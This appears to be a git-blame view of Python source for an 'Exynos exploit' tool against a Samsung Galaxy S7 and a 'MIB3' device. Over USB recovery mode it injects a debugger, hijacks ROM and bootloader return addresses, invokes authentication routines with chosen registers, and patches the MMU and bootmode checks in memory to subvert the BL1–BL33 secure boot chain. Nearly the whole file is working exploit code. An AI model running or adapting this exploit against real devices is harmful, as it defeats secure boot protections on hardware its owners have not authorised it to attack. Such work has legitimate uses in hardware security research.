self . usb_write ( b " PING " )
assert self . usb_read ( 0x200 ) == b " PONG " , " Failed to jump back to debugger "
print ( f ' Jumped to { hex ( address ) } and back ' )
2024-08-28 18:45:05 +02:00
2024-10-23 19:24:09 +02:00
2024-11-21 21:39:30 +01:00
def print_registry_status ( self ) :
""" Print potentially interesting registry status (statii?) of the device """
self . cd . arch_dbg . fetch_special_regs ( )
print ( f ' MMU is { hex ( self . cd . arch_dbg . state . R_SCTLR_EL3 . mmu ) } (0x1=enabled, 0x0=disabled) ' )
print ( f ' TTBR0_EL3: { hex ( self . cd . arch_dbg . state . TTBR0_EL3 ) } , TTBR1_EL2: { hex ( self . cd . arch_dbg . state . TTBR0_EL2 ) } , TTBR0_EL1: { hex ( self . cd . arch_dbg . state . TTBR0_EL1 ) } ' )
print ( f ' VBAR_EL3: { hex ( self . cd . arch_dbg . state . VBAR_EL3 ) } , VBAR_EL2: { hex ( self . cd . arch_dbg . state . VBAR_EL2 ) } , VBAR_EL1: { hex ( self . cd . arch_dbg . state . VBAR_EL1 ) } ' )
print ( f ' TCR_EL3: { hex ( self . cd . arch_dbg . state . TCR_EL3 ) } , TCR_EL2: { hex ( self . cd . arch_dbg . state . TCR_EL2 ) } , TCR_EL1: { hex ( self . cd . arch_dbg . state . TCR_EL1 ) } ' )
print ( f ' SCTLR_EL3: { hex ( self . cd . arch_dbg . state . SCTLR_EL3 ) } , SCTLR_EL2: { hex ( self . cd . arch_dbg . state . SCTLR_EL2 ) } , SCTLR_EL1: { hex ( self . cd . arch_dbg . state . SCTLR_EL1 ) } ' )
print ( f ' MAIR_EL3: { hex ( self . cd . arch_dbg . state . MAIR_EL3 ) } , MAIR_EL2: { hex ( self . cd . arch_dbg . state . MAIR_EL2 ) } , MAIR_EL1: { hex ( self . cd . arch_dbg . state . MAIR_EL1 ) } ' )
print ( f ' Current EL: { hex ( self . cd . arch_dbg . state . CURRENT_EL ) } ' )
2024-08-16 18:15:53 +02:00
def debugger_boot ( self ) :
"""
Boot into USB recovery mode using the debugger .
"""
2024-09-04 14:16:26 +02:00
# Setup initial debugger
2024-08-16 18:15:53 +02:00
self . setup_guppy_debugger ( )
self . cd . arch_dbg . state . auto_sync = False
self . cd . arch_dbg . state . auto_sync_special = False
logger . debug ( ' State after setting up initial debugger ' )
2024-08-05 19:37:13 +02:00
self . cd . arch_dbg . state . print_ctx ( )
2024-08-28 18:45:05 +02:00
DEBUGGER_ADDR = 0x2069000 # 0x2069000
2024-09-09 17:23:10 +02:00
# Relocate debugger
debugger = open ( " ../../dump/reloc_debugger_0x11200000.bin " , " rb " ) . read ( )
2024-09-14 16:41:21 +02:00
self . relocate_debugger ( debugger = debugger , entry = 0x11200000 , storage = 0x11203000 , g_data_received = 0x11204000 )
2024-09-09 17:23:10 +02:00
DEBUGGER_ADDR = 0x11200000
2024-11-05 17:30:09 +01:00
# Load bootloader stages
2024-11-05 18:30:55 +01:00
bl1 = open ( " ../S7/g930f_latest/g930f_sboot.bin.1.bin " , " rb " ) . read ( )
bl31 = open ( " ../S7/g930f_latest/g930f_sboot.bin.2.bin " , " rb " ) . read ( )
bl2 = open ( " ../S7/g930f_latest/g930f_sboot.bin.3.bin " , " rb " ) . read ( )
bl33 = open ( " ../S7/g930f_latest/g930f_sboot.bin.4.bin " , " rb " ) . read ( )
2024-12-09 10:51:36 +01:00
if args . target == " MIB3 " :
2024-11-05 18:30:55 +01:00
bl1 = open ( " ../mib3/boot_partitions/fwbl1_a.bin " , " rb " ) . read ( )
2024-11-21 21:39:30 +01:00
bl1 = open ( " ../mib3/modified_boot/fwbl1_mod.bin " , " rb " ) . read ( )
2024-11-05 18:30:55 +01:00
bl31 = open ( " ../mib3/boot_partitions/el3_mon_a.bin " , " rb " ) . read ( )
bl2 = open ( " ../mib3/boot_partitions/bl2_a.bin " , " rb " ) . read ( )
bl33 = open ( " ../mib3/boot_partitions/u-boot_a.bin " , " rb " ) . read ( )
2024-11-21 21:39:30 +01:00
#bl33 = open("../mib3/modified_boot/u-boot_mod.bin", "rb").read()
2024-11-05 17:30:09 +01:00
2024-09-04 14:16:26 +02:00
# Test debugger connection
2024-08-16 18:15:53 +02:00
self . cd . test_connection ( )
2024-08-28 18:45:05 +02:00
2024-09-04 14:16:26 +02:00
# ==== BL1 ====
### Overwrite boot_usb_ra to our debugger
2024-08-16 18:15:53 +02:00
hijacked_usb_ra = self . cd . memdump_region ( 0x02020f60 , 8 )
2024-08-16 19:37:25 +02:00
self . cd . memwrite_region ( 0x02020f60 , p64 ( DEBUGGER_ADDR ) )
2024-08-16 18:15:53 +02:00
### Set link register and boot into the USB function
BOOT_USB_FUNCTION = 0x000064e0
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
self . cd . restore_stack_and_jump ( BOOT_USB_FUNCTION )
2024-09-04 14:16:26 +02:00
# Wait for device return (happens after each download)
2024-08-16 18:15:53 +02:00
time . sleep ( 1 )
self . connect_device ( )
2024-09-10 18:59:32 +02:00
# Send boot stage 1
2024-09-24 18:50:11 +02:00
self . send_normal_stage ( bl1 )
2024-09-10 18:59:32 +02:00
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to jump back to debugger "
2024-09-04 14:16:26 +02:00
# Setup jump and bl_auth
AUTH_BL1 = 0x00012848 # Location of the authentication function
2024-09-24 18:50:11 +02:00
def auth_bl1 ( lr = 0x2069000 , x0 = 1 , x1 = 1 ) :
2024-08-16 18:15:53 +02:00
# Load the firmware
2024-09-24 18:50:11 +02:00
self . cd . arch_dbg . state . X0 = x0
self . cd . arch_dbg . state . X1 = x1
2024-08-16 18:15:53 +02:00
self . cd . arch_dbg . state . LR = lr #jump back to debugger when finished
self . cd . restore_stack_and_jump ( AUTH_BL1 )
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to jump back to debugger "
### Check if authentication was successful - X0 should not be 0??
# assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
2024-10-23 19:24:09 +02:00
2024-09-04 14:16:26 +02:00
# BL1 is loaded, now authenticate and patch it
2024-08-16 18:15:53 +02:00
auth_bl1 ( DEBUGGER_ADDR )
2024-09-04 14:16:26 +02:00
self . usb_write ( b " FLSH " ) # Flush cache (Frederic does this..)
2024-08-26 17:45:29 +02:00
2024-09-04 14:16:26 +02:00
# Hijack ROM download function
2024-10-23 19:24:09 +02:00
hijacked_fun = u32 ( self . cd . memdump_region ( 0x020200dc , 4 ) )
2024-08-17 12:24:47 +02:00
self . cd . memwrite_region ( 0x020200dc , p32 ( DEBUGGER_ADDR ) ) # hijack ROM_DOWNLOAD_USB for BL31
2024-11-05 17:30:09 +01:00
BL1_POINTER = 0x02021880
2024-12-09 10:51:36 +01:00
if args . target == " MIB3 " :
2024-11-05 17:30:09 +01:00
BL1_POINTER = 0x02021890
self . cd . memwrite_region ( BL1_POINTER , self . cd . arch_dbg . sc . branch_absolute ( DEBUGGER_ADDR , branch_ins = " br " ) )
2024-09-04 14:16:26 +02:00
2024-09-24 18:50:11 +02:00
# Write a patch to BL1 in memory
# self.cd.memwrite_region(0x2021800+bl1.find(b'2015'), b'2014')
2024-09-10 18:59:32 +02:00
# Jump into BL1 (sboot.bin.1.bin)
JUMP_BL1 = 0x000002c0
def jump_bl1 ( lr ) :
self . cd . arch_dbg . state . LR = lr
self . cd . restore_stack_and_jump ( JUMP_BL1 )
2024-09-04 14:16:26 +02:00
# And jump into BL1 to execute it
2024-08-16 18:15:53 +02:00
jump_bl1 ( DEBUGGER_ADDR )
2024-10-23 19:24:09 +02:00
2024-08-17 12:27:56 +02:00
# ==== BL31 ====
2024-09-04 14:16:26 +02:00
# Assure that the debugger is still alive
2024-08-17 12:24:47 +02:00
assert self . usb_read ( 0x200 ) == b " GiAs " , " Failed to jump back to debugger "
2024-10-23 19:24:09 +02:00
2024-09-04 14:16:26 +02:00
# Get current LR, and store it. Then set LR to debugger.
2024-11-12 15:48:13 +01:00
BL1_RA = self . cd . arch_dbg . state . LR
2024-08-17 20:35:52 +02:00
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
2024-09-04 14:16:26 +02:00
self . cd . restore_stack_and_jump ( hijacked_fun ) # will jump back to debugger after downloading the next stage (before executing it)
# After downloading the next stage, make sure the device reconnects
2024-08-16 18:15:53 +02:00
time . sleep ( 2 )
self . connect_device ( )
2024-11-05 17:30:09 +01:00
self . send_normal_stage ( bl31 )
2024-08-17 20:35:52 +02:00
time . sleep ( 2 )
2024-10-23 19:24:09 +02:00
2024-09-04 14:16:26 +02:00
# Assure that the debugger is returning (obligatory assuration)
2024-08-17 20:35:52 +02:00
self . usb_read ( 0x200 ) # GiAs
2024-09-10 18:59:32 +02:00
# self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # to restore the oginal boot flow, without getting back to the debugger
2024-08-28 18:45:05 +02:00
2024-09-04 14:16:26 +02:00
# Set LR to continue boot flow
2024-11-12 15:48:13 +01:00
self . cd . restore_stack_and_jump ( BL1_RA )
2024-10-23 19:24:09 +02:00
2024-09-04 14:16:26 +02:00
# Assure return to debugger
2024-08-18 13:55:11 +02:00
time . sleep ( 2 )
2024-08-26 17:45:29 +02:00
self . usb_read ( 0x200 ) # GiAs
2024-11-12 15:48:13 +01:00
# self.cd.memwrite_region(0x02031008, b"ELH") # Patch something in BL31
2024-10-23 19:24:09 +02:00
2024-11-12 15:48:13 +01:00
# Get pointer to where BL31 returns to
BL31_RA_PTR = self . cd . arch_dbg . state . LR
2024-11-05 18:30:55 +01:00
2024-08-28 18:45:05 +02:00
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
2024-09-04 14:16:26 +02:00
TTBR0_EL3 = 0x02035600 # Zeroed out
2024-09-03 19:31:41 +02:00
2024-09-04 14:16:26 +02:00
# Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
2024-11-12 15:48:13 +01:00
MMU_CHECK = 0x0202a314
2024-12-09 10:51:36 +01:00
if not args . target == " MIB3 " :
2024-11-12 15:48:13 +01:00
MMU_CHECK = 0x020244e8
2024-11-05 17:30:09 +01:00
self . cd . memwrite_region ( MMU_CHECK , struct . pack ( ' >I ' , 0x1f0c00f1 ) ) # Change check to always be false
2024-09-24 18:50:11 +02:00
# DWC3 OTG update mode -> Might be useful at some point?
# self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000))
2024-09-04 14:16:26 +02:00
# Jump into BL31 and execute it
2024-11-12 15:48:13 +01:00
BL31_POINTER = 0x02024010
2024-12-09 10:51:36 +01:00
if args . target == " MIB3 " :
2024-11-12 20:58:34 +01:00
BL31_POINTER = 0x0202a010
self . cd . restore_stack_and_jump ( BL31_POINTER ) #BL31_RA_PTR
else :
self . cd . restore_stack_and_jump ( BL31_POINTER )
2024-10-23 19:24:09 +02:00
2024-09-04 14:16:26 +02:00
# Obligatory reconnect and check of debugger
2024-08-17 12:24:47 +02:00
time . sleep ( 2 )
2024-08-16 18:15:53 +02:00
self . connect_device ( )
2024-10-23 19:24:09 +02:00
self . usb_read ( 0x200 ) # GiAs
2024-09-05 20:18:05 +02:00
BL31_ra = self . cd . arch_dbg . state . LR
2024-10-23 19:24:09 +02:00
2024-11-21 21:39:30 +01:00
self . print_registry_status ( )
2024-09-10 18:59:32 +02:00
2024-11-12 15:48:13 +01:00
# self.cd.arch_dbg.fetch_special_regs() # -> Does not work with, "--MIB3" original debugger (?->memory overlap somewhere). Only with relocated debugger.
2024-09-04 14:16:26 +02:00
VBAR_EL3 = self . cd . arch_dbg . state . VBAR_EL3
2024-08-29 21:06:15 +02:00
2024-09-09 17:23:10 +02:00
self . test_write_execute ( 0x11207010 )
2024-11-05 18:30:55 +01:00
2024-12-09 10:51:36 +01:00
#if args.target == "MIB3":
2024-11-12 15:48:13 +01:00
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
2024-12-09 10:51:36 +01:00
if args . target == " MIB3 " :
2024-12-07 20:58:35 +01:00
self . cd . memwrite_region ( 0x020553e4 , b " \x1f \x50 \x00 \x71 " )
self . cd . memwrite_region ( 0x020553f8 , b " \x1f \x50 \x00 \x71 " )
2024-11-12 15:48:13 +01:00
self . cd . restore_stack_and_jump ( hijacked_fun ) # Jumps to function that waits for next boot stage
2024-08-29 21:06:15 +02:00
2024-09-10 18:59:32 +02:00
# ==== Stage 4 BL2 ====
self . send_normal_stage ( bl2 )
2024-08-16 18:15:53 +02:00
time . sleep ( 2 )
self . connect_device ( )
2024-09-09 17:23:10 +02:00
self . usb_read ( 0x200 ) # GiAs
2024-11-21 21:39:30 +01:00
self . print_registry_status ( )
2024-09-10 18:59:32 +02:00
2024-09-09 17:23:10 +02:00
# Restore bootflow
2024-11-12 20:58:34 +01:00
print ( self . cd . arch_dbg . state . print_ctx ( ) ) # X29 here determines where the 'authentication' is taking place
2024-09-24 18:50:11 +02:00
BL33_ptr = self . cd . arch_dbg . state . X0
2024-09-17 18:28:35 +02:00
BL33_LR = self . cd . arch_dbg . state . LR
2024-09-16 17:14:14 +02:00
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
2024-10-23 19:24:09 +02:00
2024-09-17 18:28:35 +02:00
# self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)
2024-09-16 10:52:44 +02:00
# Disable this to keep access to the debugger after senindg the next stage
2024-11-12 15:48:13 +01:00
#self.cd.arch_dbg.state.X23 = DEBUGGER_ADDR # TEMPORARY
2024-09-16 17:14:14 +02:00
self . cd . restore_stack_and_jump ( hijacked_fun )
2024-11-05 18:30:55 +01:00
time . sleep ( 1 )
self . connect_device ( )
2024-11-12 20:58:34 +01:00
2024-11-21 21:39:30 +01:00
# Add 00 to the end of bl33
#bl33 += b"\x00"
2024-11-05 18:30:55 +01:00
self . send_normal_stage ( bl33 ) # Never return/completes
self . connect_device ( )
2024-11-21 21:39:30 +01:00
self . usb_read ( 0x200 )
2024-10-23 19:24:09 +02:00
2024-11-21 21:39:30 +01:00
# Change bootmode on S7 to SDCARD (allow normal booting, if pressing volume up)
2024-12-09 10:51:36 +01:00
if not args . target == " MIB3 " :
2024-11-12 20:58:34 +01:00
self . cd . memwrite_region ( 0x8f01dbdc , struct . pack ( ' >I ' , 0x03030035 ) )
self . cd . memwrite_region ( 0x8f01dbe0 , struct . pack ( ' >I ' , 0x80f9ff34 ) )
2024-10-23 19:24:09 +02:00
2024-11-12 20:58:34 +01:00
# Move default values into registers
self . cd . memwrite_region ( 0x8f021bac , struct . pack ( ' >I ' , 0x20008052 ) )
self . cd . memwrite_region ( 0x8f021bdc , struct . pack ( ' >I ' , 0x20008052 ) )
self . cd . memwrite_region ( 0x8f021bbc , struct . pack ( ' >I ' , 0x20008052 ) )
2024-11-05 17:30:09 +01:00
2024-10-23 19:24:09 +02:00
# Jump into a different function that continues the boot flow (different than BL33_LR)
2024-11-12 20:58:34 +01:00
BL33_AUTH = 0x02024e5c
2024-12-09 10:51:36 +01:00
if args . target == " MIB3 " :
2024-11-21 21:39:30 +01:00
self . cd . memwrite_region ( 0xcf08aa59 , b " \x4c \x44 \x46 \x58 " ) #58 was 57 in INIT print
self . cd . memwrite_region ( 0xcf026b94 , struct . pack ( ' >I ' , 0x210000b4 ) ) # Change bootmode to GPT
BL33_AUTH = 0x202ae18 # BL33_LR
2024-11-25 17:40:39 +01:00
# Modifying return values to continue boot flow
#self.cd.memwrite_region(0xcf05dea8, b"\xa0\x1f\x42\xf8")
2024-11-12 20:58:34 +01:00
2024-12-07 20:58:35 +01:00
# Print boot info from cf4dfb28
print ( self . cd . memdump_region ( 0xcf4dfb28 , 0x32 ) )
# Start boot from BL33
2024-11-12 20:58:34 +01:00
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
2024-11-21 21:39:30 +01:00
self . cd . restore_stack_and_jump ( BL33_AUTH )
time . sleep ( 1 )
self . usb_read ( 0x200 )
2024-11-25 17:40:39 +01:00
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
2024-12-07 20:58:35 +01:00
self . cd . arch_dbg . state . X0 = 0x0
self . cd . restore_stack_and_jump ( 0xcf05dd00 )
self . connect_device ( )
self . usb_read ( 0x200 )
# Print something over uart
self . write_uart ( DEBUGGER_ADDR , 0xcf4dfb58 )
# Try to continue the bootflow
self . cd . restore_stack_and_jump ( 0xcf0052f8 )
2024-11-25 17:40:39 +01:00
# NOT WORKING
2024-11-21 21:39:30 +01:00
self . read_ufs ( DEBUGGER_ADDR )
2024-09-16 17:14:14 +02:00
2024-08-05 19:37:13 +02:00
pass
2024-08-02 15:51:35 +02:00
2024-11-25 17:40:39 +01:00
def write_uart ( self , DEBUGGER_ADDR , data_pointer ) :
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
curr_X0 = self . cd . arch_dbg . state . X0
curr_X1 = self . cd . arch_dbg . state . X1
self . cd . arch_dbg . state . X0 = data_pointer
self . cd . arch_dbg . state . X1 = 0x0
self . cd . restore_stack_and_jump ( 0xcf05dd6c )
time . sleep ( 0.5 )
self . connect_device ( )
self . usb_read ( 0x200 )
self . cd . arch_dbg . state . X0 = curr_X0
self . cd . arch_dbg . state . X1 = curr_X1
return
2024-11-21 21:39:30 +01:00
def read_ufs ( self , DEBUGGER_ADDR ) :
"""
Read UFS
Argument structure is : param1 , param2 [ ] . With param2 being the cmd list
param1 = offset
"""
self . cd . arch_dbg . state . LR = DEBUGGER_ADDR
2024-11-25 17:40:39 +01:00
ufs_read_addr = 0xcf00eaf4
self . cd . arch_dbg . state . X0 = 0x0
self . cd . arch_dbg . state . X1 = 0x1
2024-11-21 21:39:30 +01:00
self . cd . restore_stack_and_jump ( ufs_read_addr )
2024-11-25 17:40:39 +01:00
time . sleep ( 1 )
self . connect_device ( )
2024-11-21 21:39:30 +01:00
pass
2024-10-23 19:24:09 +02:00
2024-08-02 15:51:35 +02:00
if __name__ == " __main__ " :
arg = argparse . ArgumentParser ( " Exynos exploit " )
2024-08-05 14:51:04 +02:00
arg . add_argument ( " --debug " , action = " store_true " , help = " Debug USB stack " , default = False )
2024-08-16 18:15:53 +02:00
arg . add_argument ( " --unsecure-boot " , action = " store_true " , help = " Unsecure boot " , default = False )
arg . add_argument ( " --debugger-boot " , action = " store_true " , help = " Unsecure boot " , default = False )
2024-12-07 20:59:02 +01:00
arg . add_argument ( " --load_ga " , action = " store_true " , help = " Load Gupje debugger " , default = False )
2024-12-09 10:51:36 +01:00
arg . add_argument ( " --target " , type = str , help = " Target device " , default = " s7 " , choices = [ " S7 " , " MIB3 " ] )
2024-10-23 19:24:09 +02:00
2024-08-12 18:58:49 +02:00
args = arg . parse_args ( )
2024-12-07 20:59:02 +01:00
exynos = S7Exploit ( )
2024-08-08 19:46:04 +02:00
2024-12-09 10:51:36 +01:00
# Load json configs from config folder
# config = open(f"config/{args.target}.json", "r").read()
2024-08-09 22:16:13 +02:00
if args . debug :
2024-08-08 19:46:04 +02:00
shellcode = open ( " ../dwc3_test/dwc3.bin " , " rb " ) . read ( )
exynos . exploit ( shellcode )
2024-08-09 22:16:13 +02:00
exynos . dump_memory ( write = True )
# exynos.usb_debug()
sys . exit ( 0 )
2024-10-23 19:24:09 +02:00
2024-12-07 20:59:02 +01:00
elif args . unsecure_boot :
2024-08-16 10:11:18 +02:00
exynos . unsecure_boot ( )
sys . exit ( 0 )
2024-08-08 19:46:04 +02:00
2024-08-09 22:16:13 +02:00
stage1 = open ( " stage1/stage1.bin " , " rb " ) . read ( )
exynos . exploit ( stage1 )
2024-08-16 18:15:53 +02:00
if args . debugger_boot :
exynos . debugger_boot ( )
sys . exit ( 0 )
2024-08-09 22:16:13 +02:00
exynos . setup_guppy_debugger ( )
2024-12-07 20:59:02 +01:00
if args . load_ga :
info ( " Loaded gupje, exiting " )
sys . exit ( 0 )
2024-08-09 22:16:13 +02:00
exynos . dumb_interact ( )
2024-10-23 19:24:09 +02:00
2024-09-03 19:31:41 +02:00
sys . exit ( 0 )